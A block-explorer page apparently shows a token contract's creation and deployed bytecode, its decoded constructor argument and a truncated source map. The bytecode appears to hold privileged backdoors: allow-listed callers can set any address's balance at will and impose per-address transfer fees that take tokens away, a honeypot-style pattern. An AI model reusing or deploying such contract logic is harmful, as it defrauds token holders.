4d610835565b60405161035a9190611538565b60405180910390f35b61037d60048036038101906103789190611312565b6108c7565b60405161038a919061151d565b60405180910390f35b6103ad60048036038101906103a89190611312565b61093e565b6040516103ba919061151d565b60405180910390f35b6103dd60048036038101906103d8919061127f565b610961565b6040516103ea919061167a565b60405180910390f35b61040d60048036038101906104089190611252565b6109e8565b005b60606007805461041e90611869565b80601f016020809104026020016040519081016040528092919081815260200182805461044a90611869565b80156104975780601f1061046c57610100808354040283529160200191610497565b820191906000526020600020905b81548152906001019060200180831161047a57829003601f168201915b5050505050905090565b6000806104ac610a6c565b90506104b9818585610a74565b600191505092915050565b600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661051a57600080fd5b806006546105289190611753565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600654905090565b6000806105cd610a6c565b90506105da858285610c3f565b6105e5858585610ccb565b60019150509392505050565b60006012905090565b600080610605610a6c565b90506106268185856106178589610961565b61062191906116cc565b610a74565b600191505092915050565b600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661068757600080fd5b80600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661072157600080fd5b80600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e061109a565b6107ea6000611118565b565b60026020528060005260406000206000915054906101000a900460ff1681565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606008805461084490611869565b80601f016020809104026020016040519081016040528092919081815260200182805461087090611869565b80156108bd5780601f10610892576101008083540402835291602001916108bd565b820191906000526020600020905b8154815290600101906020018083116108a057829003601f168201915b5050505050905090565b6000806108d2610a6c565b905060006108e08286610961565b905083811015610925576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091c9061165a565b60405180910390fd5b6109328286868403610a74565b60019250505092915050565b600080610949610a6c565b9050610956818585610ccb565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6109f061109a565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a579061157a565b60405180910390fd5b610a6981611118565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ae4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610adb9061163a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610b54576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4b9061159a565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c32919061167a565b60405180910390a3505050565b6000610c4b8484610961565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cc55781811015610cb7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cae906115ba565b60405180910390fd5b610cc48484848403610a74565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d329061161a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610dab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da29061155a565b60405180910390fd5b610db68383836111dc565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e34906115da565b60405180910390fd5b600060095490506000600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008114610e9857809150610f4c565b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f4b57600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff161415610f4a57600a5491505b5b5b6000610f746064610f6685886111e190919063ffffffff16565b6111f790919063ffffffff16565b90506000610f8b828761120d90919063ffffffff16565b9050858503600160008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8860405161107d919061167a565b60405180910390a3611090888888611223565b5050505050505050565b6110a2610a6c565b73ffffffffffffffffffffffffffffffffffffffff166110c061080c565b73ffffffffffffffffffffffffffffffffffffffff1614611116576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161110d906115fa565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081836111ef9190611753565b905092915050565b600081836112059190611722565b905092915050565b6000818361121b91906117ad565b905092915050565b505050565b60008135905061123781611bb9565b92915050565b60008135905061124c81611bd0565b92915050565b60006020828403121561126857611267611928565b5b600061127684828501611228565b91505092915050565b6000806040838503121561129657611295611928565b5b60006112a485828601611228565b92505060206112b585828601611228565b9150509250929050565b6000806000606084860312156112d8576112d7611928565b5b60006112e686828701611228565b93505060206112f786828701611228565b92505060406113088682870161123d565b9150509250925092565b6000806040838503121561132957611328611928565b5b600061133785828601611228565b92505060206113488582860161123d565b9150509250929050565b61135b816117e1565b82525050565b61136a816117f3565b82525050565b600061137b826116b0565b61138581856116bb565b9350611395818560208601611836565b61139e8161192d565b840191505092915050565b60006113b66023836116bb565b91506113c18261193e565b604082019050919050565b60006113d96026836116bb565b91506113e48261198d565b604082019050919050565b60006113fc6022836116bb565b9150611407826119dc565b604082019050919050565b600061141f601d836116bb565b915061142a82611a2b565b602082019050919050565b60006114426026836116bb565b915061144d82611a54565b604082019050919050565b60006114656020836116bb565b915061147082611aa3565b602082019050919050565b60006114886025836116bb565b915061149382611acc565b604082019050919050565b60006114ab6024836116bb565b91506114b682611b1b565b604082019050919050565b60006114ce6025836116bb565b91506114d982611b6a565b604082019050919050565b6114ed8161181f565b82525050565b6114fc81611829565b82525050565b60006020820190506115176000830184611352565b92915050565b60006020820190506115326000830184611361565b92915050565b600060208201905081810360008301526115528184611370565b905092915050565b60006020820190508181036000830152611573816113a9565b9050919050565b60006020820190508181036000830152611593816113cc565b9050919050565b600060208201905081810360008301526115b3816113ef565b9050919050565b600060208201905081810360008301526115d381611412565b9050919050565b600060208201905081810360008301526115f381611435565b9050919050565b6000602082019050818103600083015261161381611458565b9050919050565b600060208201905081810360008301526116338161147b565b9050919050565b600060208201905081810360008301526116538161149e565b9050919050565b60006020820190508181036000830152611673816114c1565b9050919050565b600060208201905061168f60008301846114e4565b92915050565b60006020820190506116aa60008301846114f3565b92915050565b600081519050919050565b600082825260208201905092915050565b60006116d78261181f565b91506116e28361181f565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156117175761171661189b565b5b828201905092915050565b600061172d8261181f565b91506117388361181f565b925082611748576117476118ca565b5b828204905092915050565b600061175e8261181f565b91506117698361181f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156117a2576117a161189b565b5b828202905092915050565b60006117b88261181f565b91506117c38361181f565b9250828210156117d6576117d561189b565b5b828203905092915050565b60006117ec826117ff565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611854578082015181840152602081019050611839565b83811115611863576000848401525b50505050565b6000600282049050600182168061188157607f821691505b60208210811415611895576118946118f9565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611bc2816117e1565b8114611bcd57600080fd5b50565b611bd98161181f565b8114611be457600080fd5b5056fea2646970667358221220c3779189c603b139594bb24f5b94bc22cf2e5b61ddd10294d4efaec846b6b09364736f6c6343000807003300000000000000000000000000000000000000000000000000000002540be400

Deployed Bytecode

0x608060405234801561001057600080fd5b506004361061012c5760003560e01c806349bd5a5e116100ad57806395d89b411161007157806395d89b4114610345578063a457c2d714610363578063a9059cbb14610393578063dd62ed3e146103c3578063f2fde38b146103f35761012c565b806349bd5a5e1461029f57806370a08231146102bd578063715018a6146102ed578063768dc710146102f75780638da5cb5b146103275761012c565b806323b872dd116100f457806323b872dd146101e9578063313ce567146102195780633950935114610237578063444a2a9c1461026757806344732477146102835761012c565b806306fdde0314610131578063095ea7b31461014f578063113a8c481461017f578063122df71b1461019b57806318160ddd146101cb575b600080fd5b61013961040f565b6040516101469190611538565b60405180910390f35b61016960048036038101906101649190611312565b6104a1565b604051610176919061151d565b60405180910390f35b61019960048036038101906101949190611312565b6104c4565b005b6101b560048036038101906101b09190611252565b61056f565b6040516101c2919061167a565b60405180910390f35b6101d36105b8565b6040516101e0919061167a565b60405180910390f35b61020360048036038101906101fe91906112bf565b6105c2565b604051610210919061151d565b60405180910390f35b6102216105f1565b60405161022e9190611695565b60405180910390f35b610251600480360381019061024c9190611312565b6105fa565b60405161025e919061151d565b60405180910390f35b610281600480360381019061027c9190611252565b610631565b005b61029d60048036038101906102989190611312565b6106cb565b005b6102a7610769565b6040516102b49190611502565b60405180910390f35b6102d760048036038101906102d29190611252565b61078f565b6040516102e4919061167a565b60405180910390f35b6102f56107d8565b005b610311600480360381019061030c9190611252565b6107ec565b60405161031e919061151d565b60405180910390f35b61032f61080c565b60405161033c9190611502565b60405180910390f35b61034d610835565b60405161035a9190611538565b60405180910390f35b61037d60048036038101906103789190611312565b6108c7565b60405161038a919061151d565b60405180910390f35b6103ad60048036038101906103a89190611312565b61093e565b6040516103ba919061151d565b60405180910390f35b6103dd60048036038101906103d8919061127f565b610961565b6040516103ea919061167a565b60405180910390f35b61040d60048036038101906104089190611252565b6109e8565b005b60606007805461041e90611869565b80601f016020809104026020016040519081016040528092919081815260200182805461044a90611869565b80156104975780601f1061046c57610100808354040283529160200191610497565b820191906000526020600020905b81548152906001019060200180831161047a57829003601f168201915b5050505050905090565b6000806104ac610a6c565b90506104b9818585610a74565b600191505092915050565b600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661051a57600080fd5b806006546105289190611753565b600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6000600654905090565b6000806105cd610a6c565b90506105da858285610c3f565b6105e5858585610ccb565b60019150509392505050565b60006012905090565b600080610605610a6c565b90506106268185856106178589610961565b61062191906116cc565b610a74565b600191505092915050565b600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661068757600080fd5b80600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661072157600080fd5b80600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505050565b600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6107e061109a565b6107ea6000611118565b565b60026020528060005260406000206000915054906101000a900460ff1681565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606008805461084490611869565b80601f016020809104026020016040519081016040528092919081815260200182805461087090611869565b80156108bd5780601f10610892576101008083540402835291602001916108bd565b820191906000526020600020905b8154815290600101906020018083116108a057829003601f168201915b5050505050905090565b6000806108d2610a6c565b905060006108e08286610961565b905083811015610925576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161091c9061165a565b60405180910390fd5b6109328286868403610a74565b60019250505092915050565b600080610949610a6c565b9050610956818585610ccb565b600191505092915050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6109f061109a565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a579061157a565b60405180910390fd5b610a6981611118565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ae4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610adb9061163a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610b54576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4b9061159a565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610c32919061167a565b60405180910390a3505050565b6000610c4b8484610961565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610cc55781811015610cb7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cae906115ba565b60405180910390fd5b610cc48484848403610a74565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d3b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d329061161a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610dab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da29061155a565b60405180910390fd5b610db68383836111dc565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610e3d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e34906115da565b60405180910390fd5b600060095490506000600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905060008114610e9857809150610f4c565b600073ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610f4b57600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff161415610f4a57600a5491505b5b5b6000610f746064610f6685886111e190919063ffffffff16565b6111f790919063ffffffff16565b90506000610f8b828761120d90919063ffffffff16565b9050858503600160008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555080600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508673ffffffffffffffffffffffffffffffffffffffff168873ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8860405161107d919061167a565b60405180910390a3611090888888611223565b5050505050505050565b6110a2610a6c565b73ffffffffffffffffffffffffffffffffffffffff166110c061080c565b73ffffffffffffffffffffffffffffffffffffffff1614611116576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161110d906115fa565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b600081836111ef9190611753565b905092915050565b600081836112059190611722565b905092915050565b6000818361121b91906117ad565b905092915050565b505050565b60008135905061123781611bb9565b92915050565b60008135905061124c81611bd0565b92915050565b60006020828403121561126857611267611928565b5b600061127684828501611228565b91505092915050565b6000806040838503121561129657611295611928565b5b60006112a485828601611228565b92505060206112b585828601611228565b9150509250929050565b6000806000606084860312156112d8576112d7611928565b5b60006112e686828701611228565b93505060206112f786828701611228565b92505060406113088682870161123d565b9150509250925092565b6000806040838503121561132957611328611928565b5b600061133785828601611228565b92505060206113488582860161123d565b9150509250929050565b61135b816117e1565b82525050565b61136a816117f3565b82525050565b600061137b826116b0565b61138581856116bb565b9350611395818560208601611836565b61139e8161192d565b840191505092915050565b60006113b66023836116bb565b91506113c18261193e565b604082019050919050565b60006113d96026836116bb565b91506113e48261198d565b604082019050919050565b60006113fc6022836116bb565b9150611407826119dc565b604082019050919050565b600061141f601d836116bb565b915061142a82611a2b565b602082019050919050565b60006114426026836116bb565b915061144d82611a54565b604082019050919050565b60006114656020836116bb565b915061147082611aa3565b602082019050919050565b60006114886025836116bb565b915061149382611acc565b604082019050919050565b60006114ab6024836116bb565b91506114b682611b1b565b604082019050919050565b60006114ce6025836116bb565b91506114d982611b6a565b604082019050919050565b6114ed8161181f565b82525050565b6114fc81611829565b82525050565b60006020820190506115176000830184611352565b92915050565b60006020820190506115326000830184611361565b92915050565b600060208201905081810360008301526115528184611370565b905092915050565b60006020820190508181036000830152611573816113a9565b9050919050565b60006020820190508181036000830152611593816113cc565b9050919050565b600060208201905081810360008301526115b3816113ef565b9050919050565b600060208201905081810360008301526115d381611412565b9050919050565b600060208201905081810360008301526115f381611435565b9050919050565b6000602082019050818103600083015261161381611458565b9050919050565b600060208201905081810360008301526116338161147b565b9050919050565b600060208201905081810360008301526116538161149e565b9050919050565b60006020820190508181036000830152611673816114c1565b9050919050565b600060208201905061168f60008301846114e4565b92915050565b60006020820190506116aa60008301846114f3565b92915050565b600081519050919050565b600082825260208201905092915050565b60006116d78261181f565b91506116e28361181f565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156117175761171661189b565b5b828201905092915050565b600061172d8261181f565b91506117388361181f565b925082611748576117476118ca565b5b828204905092915050565b600061175e8261181f565b91506117698361181f565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156117a2576117a161189b565b5b828202905092915050565b60006117b88261181f565b91506117c38361181f565b9250828210156117d6576117d561189b565b5b828203905092915050565b60006117ec826117ff565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b83811015611854578082015181840152602081019050611839565b83811115611863576000848401525b50505050565b6000600282049050600182168061188157607f821691505b60208210811415611895576118946118f9565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b611bc2816117e1565b8114611bcd57600080fd5b50565b611bd98161181f565b8114611be457600080fd5b5056fea2646970667358221220c3779189c603b139594bb24f5b94bc22cf2e5b61ddd10294d4efaec846b6b09364736f6c63430008070033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

00000000000000000000000000000000000000000000000000000002540be400

-----Decoded View---------------
Arg [0] : initialSupply (uint256): 10000000000

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000002540be400


Deployed Bytecode Sourcemap

27473:246:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15843:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18194:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14790:175;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14973:111;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16963:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18975:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16805:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;19679:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14640:142;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15090:154;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14603:28;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17134:125;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12225:103;;;:::i;:::-;;14421:51;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11577:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16062:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20420:424;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17467:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17723:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12483:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15843:100;15897:13;15930:5;15923:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;15843:100;:::o;18194:201::-;18277:4;18294:13;18310:12;:10;:12::i;:::-;18294:28;;18333:32;18342:5;18349:7;18358:6;18333:8;:32::i;:::-;18383:4;18376:11;;;18194:201;;;;:::o;14790:175::-;14875:18;:30;14894:10;14875:30;;;;;;;;;;;;;;;;;;;;;;;;;14866:40;;;;;;14953:3;14938:12;;:18;;;;:::i;:::-;14917:7;:18;14925:9;14917:18;;;;;;;;;;;;;;;:39;;;;14790:175;;:::o;14973:111::-;15031:7;15059:6;:17;15066:9;15059:17;;;;;;;;;;;;;;;;15052:24;;14973:111;;;:::o;16963:108::-;17024:7;17051:12;;17044:19;;16963:108;:::o;18975:295::-;19106:4;19123:15;19141:12;:10;:12::i;:::-;19123:30;;19164:38;19180:4;19186:7;19195:6;19164:15;:38::i;:::-;19213:27;19223:4;19229:2;19233:6;19213:9;:27::i;:::-;19258:4;19251:11;;;18975:295;;;;;:::o;16805:93::-;16863:5;16888:2;16881:9;;16805:93;:::o;19679:238::-;19767:4;19784:13;19800:12;:10;:12::i;:::-;19784:28;;19823:64;19832:5;19839:7;19876:10;19848:25;19858:5;19865:7;19848:9;:25::i;:::-;:38;;;;:::i;:::-;19823:8;:64::i;:::-;19905:4;19898:11;;;19679:238;;;;:::o;14640:142::-;14708:18;:30;14727:10;14708:30;;;;;;;;;;;;;;;;;;;;;;;;;14699:40;;;;;;14766:8;14750:13;;:24;;;;;;;;;;;;;;;;;;14640:142;:::o;15090:154::-;15170:18;:30;15189:10;15170:30;;;;;;;;;;;;;;;;;;;;;;;;;15161:40;;;;;;15233:3;15212:6;:17;15219:9;15212:17;;;;;;;;;;;;;;;:24;;;;15090:154;;:::o;14603:28::-;;;;;;;;;;;;;:::o;17134:125::-;17208:7;17235;:16;17243:7;17235:16;;;;;;;;;;;;;;;;17228:23;;17134:125;;;:::o;12225:103::-;11463:13;:11;:13::i;:::-;12290:30:::1;12317:1;12290:18;:30::i;:::-;12225:103::o:0;14421:51::-;;;;;;;;;;;;;;;;;;;;;;:::o;11577:87::-;11623:7;11650:6;;;;;;;;;;;11643:13;;11577:87;:::o;16062:104::-;16118:13;16151:7;16144:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;16062:104;:::o;20420:424::-;20513:4;20530:13;20546:12;:10;:12::i;:::-;20530:28;;20569:24;20596:25;20606:5;20613:7;20596:9;:25::i;:::-;20569:52;;20660:15;20640:16;:35;;20632:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;20745:60;20754:5;20761:7;20789:15;20770:16;:34;20745:8;:60::i;:::-;20832:4;20825:11;;;;20420:424;;;;:::o;17467:193::-;17546:4;17563:13;17579:12;:10;:12::i;:::-;17563:28;;17602;17612:5;17619:2;17623:6;17602:9;:28::i;:::-;17648:4;17641:11;;;17467:193;;;;:::o;17723:151::-;17812:7;17839:11;:18;17851:5;17839:18;;;;;;;;;;;;;;;:27;17858:7;17839:27;;;;;;;;;;;;;;;;17832:34;;17723:151;;;;:::o;12483:201::-;11463:13;:11;:13::i;:::-;12592:1:::1;12572:22;;:8;:22;;;;12564:73;;;;;;;;;;;;:::i;:::-;;;;;;;;;12648:28;12667:8;12648:18;:28::i;:::-;12483:201:::0;:::o;10212:98::-;10265:7;10292:10;10285:17;;10212:98;:::o;24833:380::-;24986:1;24969:1